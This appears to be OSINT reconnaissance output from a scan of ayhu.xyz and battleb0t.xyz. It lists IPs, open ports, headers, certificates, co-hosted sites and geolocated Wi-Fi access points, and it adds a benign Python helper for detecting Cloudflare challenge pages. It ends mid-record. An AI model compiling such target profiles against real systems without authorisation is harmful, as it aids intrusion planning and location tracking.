| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
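The `cf-mitigated: challenge` header in the two header rows above, and the "URL (Form)" row further down whose only form is Cloudflare's own `challenge-form`, show that what the crawler fetched from ayhu.xyz was the managed-challenge interstitial, not the target page. The helper below is an added example, not SpiderFoot code: it recognises the interstitial from the headers or from the inline `_cf_chl_opt` blob, pulls out the zone and ray id for logging, and strips the per-visit `__cf_chl_*_tk` token so the canonical URL is what gets recorded. The sample header dictionaries and body excerpt are constructed from values captured in this scan.

```python
"""Recognise Cloudflare's managed-challenge interstitial and canonicalise
its URL. Added example, not SpiderFoot code; the sample headers and body
excerpt below are constructed from the values captured in this scan."""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Fingerprints of the interstitial as served in this scan.
CHALLENGE_TITLE = "<title>Just a moment...</title>"
BODY_MARKERS = (
    "window._cf_chl_opt",
    'id="challenge-form"',
    "/cdn-cgi/challenge-platform/",
)
TOKEN_PARAM = re.compile(r"^__cf_chl_(?:f_|rt_)?tk$")


def is_cloudflare_challenge(headers: dict, body: str = "") -> bool:
    """True when the response is the challenge page rather than the origin's."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("cf-mitigated", "").strip().lower() == "challenge":
        return True  # authoritative: Cloudflare labels the mitigation itself
    if h.get("server", "").lower() == "cloudflare" and CHALLENGE_TITLE in body:
        return True
    return any(marker in body for marker in BODY_MARKERS)


def challenge_details(body: str) -> dict:
    """Zone and ray id from the inline _cf_chl_opt blob, useful when logging
    why a URL was skipped instead of parsed."""
    zone = re.search(r"cZone:\s*'([^']*)'", body)
    ray = re.search(r"cRay:\s*'([^']*)'", body)
    return {"zone": zone.group(1) if zone else None,
            "ray": ray.group(1) if ray else None}


def strip_challenge_token(url: str) -> str:
    """Remove the per-visit __cf_chl_*_tk parameter so the finding records
    the canonical URL, not one copy of a throwaway challenge token."""
    parts = urlsplit(url)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if not TOKEN_PARAM.match(k)]
    return urlunsplit(parts._replace(query=urlencode(kept)))


# Constructed samples (abbreviated from the rows in this table).
CF_HEADERS = {"server": "cloudflare", "cf-mitigated": "challenge",
              "cf-ray": "7c5f8c5a3bb81a1b-EWR",
              "content-type": "text/html; charset=UTF-8"}
ORIGIN_HEADERS = {"server": "nginx", "content-type": "text/html",
                  "content-encoding": "gzip"}
CF_BODY = (CHALLENGE_TITLE
           + '<form id="challenge-form" method="POST"></form>'
           + "<script>window._cf_chl_opt={cvId: '2', cZone: 'ayhu.xyz', "
           + "cType: 'managed', cRay: '7c5f8c59d97743e3',};</script>")

if __name__ == "__main__":
    url = ("https://ayhu.xyz/lol.html?__cf_chl_f_tk="
           "74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU")
    if is_cloudflare_challenge(CF_HEADERS, CF_BODY):
        print("challenge page", challenge_details(CF_BODY),
              "->", strip_challenge_token(url))
```

A crawler that applies this check should record the stripped URL with a "blocked by WAF challenge" note rather than feeding the interstitial's form, headers and inline script into the form, header and software-fingerprinting modules, since every one of those findings would describe Cloudflare rather than the target.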
| 2023-05-12 02:44:38 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Cloudflare | nuke.battleb0t.xyz |
| 2023-05-12 02:45:29 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'SC', u'country_tld': u'.us', u'ip': u'104.196.30.220', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'North Charleston', u'network': u'104.196.0.0/18', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 32.853, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'GOOGLE-CLOUD-PLATFORM', u'postal': u'29405', u'asn': u'AS396982', u'country': u'US', u'region': u'South Carolina', u'longitude': -79.9876, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 104.196.30.220 |
| 2023-05-12 03:09:50 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 82.170.74.34.bc.googleusercontent.com | 34.74.170.82 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 200WMadison (Net ID: 00:01:21:30:9B:24) | 41.8781, -87.6298 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.166): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:24 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | oldfluid.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Wayport_Access (Net ID: 00:14:6A:5B:53:91) | 32.8608, -79.9746 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01101101.github.io | 185.199.111.153 |
| 2023-05-12 03:01:14 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.131): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Room 229 (Net ID: 00:02:2D:8B:9E:AE) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:41:56 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | mn2.tjdev.de | 45.131.109.48 |
| 2023-05-12 02:44:13 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.io | www.battleb0t.xyz |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2083 | 104.21.71.14 |
| 2023-05-12 02:55:25 | Raw Data from RIRs | No | Google | 1 | 0 | 2 | 0 | None | {'webSearchUrl': u'https://www.google.com/search?q=site:www.ayhu.xyz&aq=t&oe=utf-8&client=firefox-a&ie=utf-8&rls=org.mozilla%3Aen-US%3Aofficial', 'urls': ['https://www.ayhu.xyz/']} | www.ayhu.xyz |
| 2023-05-12 03:43:57 | URL (Form) | No | Page Information | 0 | 0 | 4 | 0 | None | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c59d97743e3')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IzWcLwqG74V5tV1nWv6NwCgv19x6fOKHH9bpAKGqFvs-1683861861-0-AaT1IDJ8zL-HPKAcS5jW_S_lOAZThpdmCpakWJJZLTdl-YC7YmW7x0R3Esq2ci5pRxETFrXUoScSBrwB5quPRe1171zsRq5FO5HvSBsT8wSH48d6cjZBcafhFd-gYMgKn5vz-FkJUPQ0nF10-q2ubdvcw8hKSSRUsAC4C2bgwDMz0kRykTgIN5O-4hUEH_aIMPUl85RgiecFAuvX8Ivy5H7CWHsXJNLmrFihUW3yur5y4mznmwIt6LoJGKtAduIhk1MMkrSy06zOCVQNVecBCYfPFg-LQUxzu01zND8kx6XIr4D_Z7JCVLT2xHDvC0QW8SVEpEQxyz1_6w4Q_kXekAKzWUv6f2WQc9reLDcoidSiSGME_E1JbznCGlu2Qcv2UxBiUp3ZaVMVnVkjfbD8tvqsMpOiPHRoL0QGNOvZC9IWd3DmNkLVl0o7A7gZ6X6XvmxN8FN6zQ5MuokY1veB1HzJur_7DeYGkiQKi-0P2vRxvm4WDXUmU4f2tq7Esl4HSqC16vv9LBLaBAi8Z_5ASfDKC4_Qtwk5ocpapPABdtQe_KyihhYQ0p3PsebP3qabKmLOkD2fDvF3lYLd3qMvC4RgGh-YX8l7PTUCq3wEfd8Mi9e6YReBeIzcGw5PwaoMHFYsP5RhUMwk71xYoONoQnXtJO45ecOy75oe90Gm07DUOsZsURI3qtJbwRlmpa7xW_oJhMCvGoxCaFBmv4Tj_3i4JWKOMf7hpKtp919xj-jQIAWQmSIDBw3LhMZPRePjKwSZV17PsqlmFxhMjxxo_oGcprk2tlsBrXLDx9NJVWy2DHDR-TPwL1u1-c5lRkjOzwwNIlsSIltqwOI6w4aVA6MdRM9LQlE6JVGhJTOkyMSmOGg0b-gPtNYSVQZ4M0bbvY5ZejvC-622MlBNpTcTQgj-Hr5BRzvJOQNVBtKeZNEcL0V-HlUOqjgsgCuZ0n-_DmccPSp6yXjib7zziw0VsFZ51VNwFMiyAJLSoQVd1OjGuw3fSFPRsqIT0NzkM6LJJ9oyKVkZXep7mdpjCvm52q0byqZXvzL2VDAtJAJmAXjedpHk-ixt-DqOfzQw9GqcICnOaIAwGCalMfoPOf8GPEND9RClu9LRyO_FDNt75C01Varldc5Ftwg8k-rAHBToDSA8_BQdwA01UognhxgoBkv5pTU2f0H6TbryBj0d8lUJpXsYh3CtyN0y8DOT_kz_DjrrzIT964Pdi7AsCCs8mo2IE6lrD73n8Izje7P97pkFkPjlBN2jtfhSvPURw_vpTJ5ZaaFdYA9KK-YFF68xMCw6ewAMK1rkYSoe1oqSv02a9QAvlbxHhD_COD3weHDV-tI_xq_UVBQKGO4fDKE5ZB_Li_qQJ1UU8CLWZeL01WBdYpUyqwj8DSDtW_hWLGQxeKSnHsjkNN44s8ztTjWQa0EOv111zkoc_jo1-AKbBfegf0gXFbeefPUQPApaVp0ZSh976fXDUBkg-u9zIFuO8PmOpT12qOluulzM3HAWuIXPfFdKdkuM_0Ju0J2nYUnPnIIPw7-X0VlO10ISCMaRppc2X6T6WN3Me0ur-AgpXQrtaOHERtZpzl81diItC7rlhoi2hcwlyknYz9uG6Jvt4vO7CVGEkxo64WkJUYfdQcxWDVfCj5P8OtigH5bAFPrPlThHqTc5vpPnWpu_04hxNRR1-yz89uQ30xUpmEOd55phY60kcWBwhTfKO_t_0MJs_4gMTnO_VQemTQRtnrcmjKY2pn8nAizQEc0LX-nJ_4sW5z-DGM44AAFGVM5-U7o0Y7m1jXwg99HdEmqr2iPndrQh3ksnfvVAApgCg0pbwWbA71pkVfyO8vPpUv_GruozMnSwm3sFOR28jhXLHljB6WOMjmilFX-I80iAeT78A5CMWmca6
g1quxd5xHVTMFnl-Ys3ieqarC7YmJ7eytJNcbcsYSdnciNL21ndjddEi22yCTG9No7nWap74I3S-XDZ5j0YJh9aMipl2sHc0u1U-Vx2vJmPYYV1MWTS_cbbT2ub5ALyjMgyaSA96qpG_Ooy4cFCkf0E0RRynEWRVadMZE1Vz5bBogaFEOjsc334EAR0zTIX8_4nnRO5mOvEVRo4ZTcKeicbfVjehihRxW1wdSDJAbbGCjjkZj3DldP4NK0vlhWlD9UbhT6NEC6tNcCjkKUECuinurOI-oV4Cegh-51bGD-UpvxqLsfIQd9QODY03eyCxUur045Y22aLoD51JCbhy39Jp0fS35dbrG4QIggvUdxGVolRMemldY1hGoUkHPtE8nB2YB7L2z90pSQRrkz2F1mucH6C2aK0d1BE2f04Z7nAiGFk7bERb053H4pvO-fGR73M06TI9KFQDNVYHk7iyF8yJ8kA23l9FgJhokSfUX3_PYhrtNIdVilfmf2nfkSfGzPgsBbAL-1WUlksPvUQq7Tut8_2gnISEhXjovKigslLYWTdPYupiAliABg3BLe_WNuc41K408YYwipU-2SdiixQBhgUVLS8Sh615rA">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '89417',
cRay: '7c5f8c59d97743e3',
cHash: 'd514be865123f26',
cUPMDTk: "\/lol.html?__cf_chl_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MTg2MS40MTQwMDA=',
m: 'cETLdgv65AVfRnLUKPe0Cd6r3wJgEhjfW5wAN2YKd/o=',
i1: 'w+O5Ul3LVrlFQJyL4ELS5Q==',
i2: 'eUom9RfWfCbkQbM7K2vx8A==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c59d97743e3');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c59d97743e3';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpanel.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.81): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SWLFO (Net ID: 00:11:95:4C:CD:45) | 32.8608, -79.9746 |
| 2023-05-12 02:54:41 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06QWFV48ACFBYY7E5EAJW1H
Date: <REDACTED>
Content-Length: 0
| 104.196.30.220 |
| 2023-05-12 02:54:20 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz | http://nuke.battleb0t.xyz/ |
| 2023-05-12 02:46:49 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | CN=*.cloudwaysapps.com | 64.226.81.43 |
| 2023-05-12 02:54:20 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2000::/35 | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:03:33 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 008security.github.io |
| 2023-05-12 02:54:30 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 64.226.81.43 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:00:21:01) | 37.7813933,-122.3918002 |
| 2023-05-12 02:54:18 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/css;charset=utf-8 | https://pics.battleb0t.xyz/gallery.css |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.148): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet8FBA (Net ID: 00:01:36:5C:8F:B8) | 37.7813933,-122.3918002 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo8BC690 (Net ID: 00:0C:F6:8B:C6:90) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 21880a (Net ID: 00:02:2D:21:88:0A) | 37.7642, -122.3993 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | curve25519-sha256@libssh.org | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": 